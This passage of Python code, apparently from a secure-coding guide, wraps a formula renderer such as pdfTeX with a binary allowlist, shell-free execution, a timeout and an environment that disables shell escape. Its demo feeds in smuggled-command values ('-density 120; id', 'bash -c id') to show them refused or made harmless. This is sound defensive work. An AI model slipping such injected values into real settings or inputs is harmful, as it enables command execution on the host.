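    if not words or words[0] not in ALLOWED_BINARIES:
        raise ValueError(f"renderer binary not allowed: {words[:1]}")
    return words + list(extra_args)


def pdftex_env() -> dict[str, str]:
    """Environment for pdfTeX.  openin_any=p ('paranoid') makes \\input and
    \\openin of files outside the current directory fail; shell_escape=f
    disables \\write18 whatever the site texmf.cnf says.  Pair with the
    -no-shell-escape command-line flag for belt and braces."""
    return {"PATH": "/usr/bin:/bin", "LANG": "C", "openin_any": "p", "shell_escape": "f"}


def run_renderer(argv: list[str], *, timeout_s: float, cwd: str | None = None,
                 env: dict[str, str] | None = None) -> RenderResult:
    """Run argv directly (shell=False) and kill it after timeout_s seconds."""
    try:
        proc = subprocess.run(argv, shell=False, cwd=cwd, env=env,
                              capture_output=True, timeout=timeout_s)
    except subprocess.TimeoutExpired:
        return RenderResult(False, True, None, "renderer exceeded time limit")
    except FileNotFoundError as exc:
        return RenderResult(False, False, None, f"not found: {exc.filename}")
    return RenderResult(proc.returncode == 0, False, proc.returncode,
                        proc.stderr.decode(errors="replace")[:200])


def demo() -> dict:
    """Exercise the wrapper with the interpreter standing in for a renderer."""
    out: dict = {}
    # A formula that never finishes rendering: the time limit ends it.
    out["hang"] = run_renderer([sys.executable, "-c", "import time; time.sleep(30)"], timeout_s=1)
    # An injected admin setting: '120;' and 'id' are plain arguments; nothing runs 'id'.
    out["inject_argv"] = build_argv("/usr/bin/convert -density 120; id", [])
    # A setting that names an unlisted binary is refused before exec.
    try:
        build_argv("bash -c id", [])
        out["rejected"] = ""
    except ValueError as exc:
        out["rejected"] = str(exc)
    return out


# Typical pdfTeX call, assuming a per-request job directory holding formula.tex:
# run_renderer(build_argv("/usr/bin/pdflatex -no-shell-escape -interaction=batchmode",
#                         ["formula.tex"]), timeout_s=10, cwd=jobdir, env=pdftex_env())
```

The time limit is the cheap control against CVE-2026-26047-style exhaustion but is only half of it: a renderer that is killed after ten seconds still burned ten seconds of a worker, so the same wrapper belongs behind a per-user rate limit or a cache keyed on the formula text.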